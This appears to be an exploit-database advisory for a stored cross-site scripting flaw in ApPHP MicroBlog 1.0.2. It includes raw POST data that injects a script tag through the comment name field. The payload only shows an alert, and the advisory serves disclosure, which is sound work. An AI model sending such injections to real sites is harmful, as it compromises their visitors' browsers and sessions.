ApPHP MicroBlog version 1.0.2 suffers from a persistent cross site scripting vulnerability.
54f9a6408d7424239c925526926536e2bfbb7e2c80a0aa8a513e71814f9a3a60
# Exploit Title : ApPHP MicroBlog 1.0.2 - Stored Cross
Site Scripting
# Author : Besim
# Google Dork :
# Date : 12/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : -
# Software link : https://www.scriptdungeon.com/jump.php?ScriptID=9162
Description :
Vulnerable link : https://site_name/path/index.php?page=posts&post_id=
Stored XSS Payload ( Comments ): *
# Vulnerable URL :
https://site_name/path/index.php?page=posts&post_id= - Post comment section
# Vuln. Parameter : comment_user_name
############ POST DATA ############
task=publish_comment&article_id=69&user_id=&comment_user_name=<script>alert(7);</script>&comment_user_email=besimweptest@yopmail.com&comment_text=Besim&captcha_code=DKF8&btnSubmitPC=Publish
your comment
############ ######################